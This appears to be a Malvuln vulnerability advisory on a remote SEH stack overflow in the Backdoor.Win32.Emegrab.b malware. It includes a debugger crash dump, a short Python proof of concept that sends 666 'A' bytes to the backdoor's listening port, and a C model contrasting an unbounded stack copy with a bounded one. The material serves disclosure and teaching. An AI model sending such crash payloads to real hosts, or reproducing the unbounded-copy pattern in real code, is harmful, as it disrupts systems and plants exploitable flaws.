Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
Original source: https://malvuln.com/advisory/19a14d0414aec62ef38378de2e8b259d.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Emegrab.b
Vulnerability: Remote Stack Buffer Overflow (SEH)
Family: Emegrab
Type: PE32
MD5: 19a14d0414aec62ef38378de2e8b259d
Vuln ID: MVID-2024-0675
ASLR: False
DEP: False
CFG: False
Safe SEH: False
Disclosure: 03/13/2024
Description: The malware typically listens on TCP port 2323, though it has also been observed using 4823. On subsequent restarts it has used 3012, 3182, 4735, 4578, 4133, 5347 and 4978 before eventually reusing port 2323. Third-party adversaries who can reach the server can send a specially crafted payload that triggers a stack buffer overflow, overwriting the ECX and EIP registers and the Structured Exception Handler (SEH).
Memory Dump:
(14c0.b6c): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000
eip=41414141 esp=260013e8 ebp=26001408 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
0:009> .ecxr
eax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000
eip=41414141 esp=260013e8 ebp=26001408 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
0:009> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** WARNING: Unable to verify checksum for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e
*** ERROR: Symbol file could not be found. Defaulted to export symbols for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e -
FAULTING_IP:
Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b
0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al
EXCEPTION_RECORD: 260f5de8 -- (.exr 0x260f5de8)
ExceptionAddress: 0040fa2b (Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0x0000fa2b)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 26100000
Attempt to write to address 26100000
PROCESS_NAME: Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000008
EXCEPTION_PARAMETER2: 41414141
WRITE_ADDRESS: 41414141
FOLLOWUP_IP:
Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b
0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al
FAILED_INSTRUCTION_ADDRESS:
+fa2b
41414141 ?? ???
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
IP_ON_HEAP: 41414141
IP_IN_FREE_BLOCK: 41414141
CONTEXT: 260f5e38 -- (.cxr 0x260f5e38)
eax=00000041 ebx=00000000 ecx=0be58a88 edx=260f61e0 esi=00009cc8 edi=00433f74
eip=0040fa2b esp=260f6298 ebp=260fff80 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0xfa2b:
0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al ss:002b:26100000=??
Resetting default scope
FAULTING_THREAD: ffffffff
BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141
PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141
DEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141
LAST_CONTROL_TRANSFER: from 41414141 to 0040fa2b
FRAME_ONE_INVALID: 1
STACK_TEXT:
260f6298 0040fa2b backdoor_win32_emegrab_b+0xfa2b
260fff88 41414141 unknown!printable+0x0
260fff8c 41414141 unknown!printable+0x0
260fff90 41414141 unknown!printable+0x0
260fff94 41414141 unknown!printable+0x0
260fff98 41414141 unknown!printable+0x0
260fff9c 41414141 unknown!printable+0x0
260fffa0 41414141 unknown!printable+0x0
260fffa4 41414141 unknown!printable+0x0
260fffa8 41414141 unknown!printable+0x0
260fffac 41414141 unknown!printable+0x0
260fffb0 41414141 unknown!printable+0x0
260fffb4 41414141 unknown!printable+0x0
260fffb8 41414141 unknown!printable+0x0
260fffbc 41414141 unknown!printable+0x0
260fffc0 41414141 unknown!printable+0x0
260fffc4 41414141 unknown!printable+0x0
260fffc8 41414141 unknown!printable+0x0
260fffcc 41414141 unknown!printable+0x0
260fffd0 41414141 unknown!printable+0x0
260fffd4 41414141 unknown!printable+0x0
260fffd8 41414141 unknown!printable+0x0
260fffdc 41414141 unknown!printable+0x0
260fffe0 41414141 unknown!printable+0x0
260fffe4 41414141 unknown!printable+0x0
260fffe8 41414141 unknown!printable+0x0
260fffec 41414141 unknown!printable+0x0
260ffff0 41414141 unknown!printable+0x0
260ffff4 41414141 unknown!printable+0x0
260ffff8 41414141 unknown!printable+0x0
260ffffc 41414141 unknown!printable+0x0
26100000 41414141 unknown!printable+0x0
STACK_COMMAND: .cxr 00000000260F5E38 ; kb ; dds 260f6298 ; kb
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: backdoor_win32_emegrab_b+fa2b
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d
IMAGE_NAME: Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e
DEBUG_FLR_IMAGE_TIMESTAMP: 4a822c0e
FAILURE_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e!Unknown
BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_backdoor_win32_emegrab_b+fa2b
0:009> !exchain
260013fc: ntdll!ExecuteHandler2+44 (775e9d70)
260fffcc: 41414141
Invalid exception stack at 41414141
Exploit/PoC:
import socket

MALWARE_HOST = "x.x.x.x"   # host running the backdoor
PORT = 2323                # default listener port; see Description for the others observed

# 666-byte "A" filler; this fill pattern is what appears as 41414141 in the
# registers and SEH chain in the memory dump above.
PAYLOAD = "A" * 666
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((MALWARE_HOST, PORT))
    s.send(PAYLOAD.encode())
print("Backdoor.Win32.Emegrab BOF Exploit by Malvuln")
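The faulting instruction in the dump above, a byte store at [esp+esi+0A0h] whose index keeps growing, together with the 41414141 handler in the !exchain output, is the textbook unbounded copy into a stack buffer that runs over the SEH registration record. As an added illustration that is not the malware's code or the advisory's PoC, the C model below reconstructs that pattern beside a bounded copy and runs a 666-byte "A" payload through both; the frame layout, the buffer size and the original handler value are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
/* Hypothetical model of the frame the dump implies (not the malware's code):
 * a fixed local buffer with the thread's EXCEPTION_REGISTRATION record above
 * it and a little more stack up to the top of the region. Sizes are assumed. */
#define BUF_SIZE    0x200u
#define PAYLOAD_LEN 666     /* length used by the advisory's PoC */

struct frame {
    uint8_t  buf[BUF_SIZE];
    uint32_t seh_next;      /* EXCEPTION_REGISTRATION.Next */
    uint32_t seh_handler;   /* EXCEPTION_REGISTRATION.Handler */
    uint8_t  rest[0x100];   /* stack between the record and the region top */
};

/* Vulnerable pattern: byte i of the input lands at buf[i] with i bounded only
 * by the input, like the looping "mov byte ptr [esp+esi+0A0h],al" above.
 * Writes stop at the frame end, where the real process faulted (26100000). */
size_t store_unbounded(struct frame *f, const uint8_t *in, size_t n)
{
    uint8_t *p = (uint8_t *)f;
    size_t i;
    for (i = 0; i < n && i < sizeof *f; i++)
        p[i] = in[i];       /* no check against BUF_SIZE */
    return i;               /* bytes stored */
}

/* Hardened form: refuse anything that does not fit before copying. */
int store_bounded(struct frame *f, const uint8_t *in, size_t n)
{
    if (n > BUF_SIZE)
        return -1;          /* oversize input dropped, frame untouched */
    memcpy(f->buf, in, n);
    return 0;
}

/* Pushes the PoC-sized "A" payload through one of the copies and reports
 * whether the handler slot became 0x41414141, the value !exchain showed. */
int handler_hijacked(int hardened)
{
    uint8_t payload[PAYLOAD_LEN];
    struct frame f = {0};
    f.seh_handler = 0xCAFEBABEu;    /* constructed stand-in for the real handler */
    memset(payload, 'A', sizeof payload);
    if (hardened)
        store_bounded(&f, payload, sizeof payload);
    else
        store_unbounded(&f, payload, sizeof payload);
    return f.seh_handler == 0x41414141u;
}
```

With the unbounded copy the handler slot reads 0x41414141 after the 666-byte payload; the bounded copy rejects the input and leaves the record intact.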
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).